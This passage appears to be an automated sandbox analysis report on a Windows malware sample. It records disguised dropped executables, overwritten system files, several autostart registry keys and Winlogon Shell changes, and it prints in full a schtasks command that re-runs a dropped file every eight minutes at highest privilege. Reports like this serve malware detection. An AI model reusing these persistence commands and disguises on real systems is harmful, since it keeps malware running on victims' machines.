                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ktmw32.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rasapi32.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rasman.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rtutils.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mswsock.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: winhttp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: winnsi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rasadhlp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: fwpuclnt.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: amsi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: userenv.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: edputil.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: winmm.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: winmmbase.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: dwrite.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mmdevapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: devobj.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ksuser.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: avrt.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: audioses.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: powrprof.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: umpdc.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: msacm32.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: midimap.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: windowscodecs.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: dpapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: secur32.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: schannel.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mskeyprotect.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ntasn1.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ncrypt.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ncryptsslp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: msasn1.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: gpapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: Udzp7lL5ns.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: Udzp7lL5ns.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: Udzp7lL5ns.exeStatic file information: File size 1933824 > 1048576
                            Source: Udzp7lL5ns.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d7a00
                            Source: Udzp7lL5ns.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.pdb source: Udzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.pdb source: Udzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF848F34A49 push ds; retf 0_2_00007FF848F34A4D
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF84932E2D0 push edi; ret 0_2_00007FF84932E2D7
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF84932E4A5 push ebp; ret 0_2_00007FF84932E4A6
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF84932E3AA push esi; ret 0_2_00007FF84932E3B1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF84932E605 push esp; ret 0_2_00007FF84932E606
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FF848E2D2A5 pushad ; iretd 32_2_00007FF848E2D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FF848F4C445 push ebx; retf 32_2_00007FF848F4C44A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF848E2D2A5 pushad ; iretd 34_2_00007FF848E2D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF849012316 push 8B485F91h; iretd 34_2_00007FF84901231B
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeCode function: 52_2_00007FF848F14A49 push ds; retf 52_2_00007FF848F14A4D
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F14A49 push ds; retf 55_2_00007FF848F14A4D
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F460B1 pushfd ; ret 55_2_00007FF848F460F1
                            Source: Udzp7lL5ns.exeStatic PE information: section name: .text entropy: 7.546099188282502
                            Source: ApplicationFrameHost.exe.0.drStatic PE information: section name: .text entropy: 7.546099188282502
                            Source: LaHYItspByFGQiJUMBgDGadp.exe.0.drStatic PE information: section name: .text entropy: 7.546099188282502
                            Source: Memory Compression.exe.0.drStatic PE information: section name: .text entropy: 7.546099188282502
                            Source: LaHYItspByFGQiJUMBgDGadp.exe0.0.drStatic PE information: section name: .text entropy: 7.546099188282502

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\DHvXeCGn.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\maoHSLGQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Program Files (x86)\Windows Mail\Memory Compression.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\XMmLkVMA.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\cflUKPKy.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\EnQNlhbf.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\wJHXBnLy.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\BQKoNvFu.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\MvRfNUhf.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\SxREamFR.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\XMmLkVMA.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\EnQNlhbf.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\wJHXBnLy.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\maoHSLGQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\DHvXeCGn.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\MvRfNUhf.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\BQKoNvFu.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\cflUKPKy.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\SxREamFR.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile created: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHostJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHostJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udzp7lL5nsJump to behavior
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHostJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHostJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udzp7lL5nsJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udzp7lL5nsJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udzp7lL5nsJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udzp7lL5nsJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadpJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
